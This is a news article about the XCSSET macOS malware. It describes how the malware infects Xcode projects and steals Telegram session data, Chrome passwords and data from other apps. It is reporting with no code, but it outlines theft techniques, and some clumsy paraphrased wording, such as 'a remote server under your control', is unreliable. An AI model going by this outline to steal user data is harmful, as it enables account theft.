macOS Malware XCSSET

24th July 2021, Kathmandu

Google chrome and Telegram Software now have been targeted by Nasty macOS Malware XCSSET

Malware targeting the macOS operating system has been updated again, adding more functionality to its suite of tools, allowing you to collect and filter sensitive data stored in various applications (including applications such as Google Chrome and Telegram), as it further “improves their tactics. “

 XCSSET was discovered in August 2020 when it was discovered to use an unusual distribution method to target Mac developers, which involved injecting malicious payloads into Xcode executed when the project file was compiled into the Xcode IDE project.

In early April this year, XCSSET received an update that allowed malware authors to attack macOS 11 Big Sur and Macs running on the M1 chipset by circumventing new security policies set by Apple on the latest operating system.

“Malware downloads its own open tool from its C2 server, which has a temporary signature, and if it is on macOS version 10.15 and earlier, it will continue to use the system’s built-in open command to run the application,” Trends Micro researchers have noted above.

Now, according to a new article published by a cybersecurity company on Thursday, XCSSET is found to run a malicious AppleScript file to compress the folder containing the Telegram data (“~ / Library / Group Containers / Telegram “) to compress the file. The file is then uploaded to a remote server under your control, allowing the threat actor to log in with the victim’s account.

 Using Google Chrome, malicious software attempts to steal the passwords stored in the web browser. These passwords are also encrypted with a master password called the “secure storage key”, using a dialog box to trick users into granting root privileges. Fraud and abuse of elevated privileges Run an unauthorized shell command to retrieve the master key from the iCloud keychain, after which the content is decrypted and transferred to the server.

 In addition to Chrome and Telegram, XCSSET can also steal data from various applications (such as Evernote, Opera, Skype, WeChat, and Apple’s contacts and notes applications) by retrieving these data from their respective sandbox directories Valuable information.


Please enter your comment!
Please enter your name here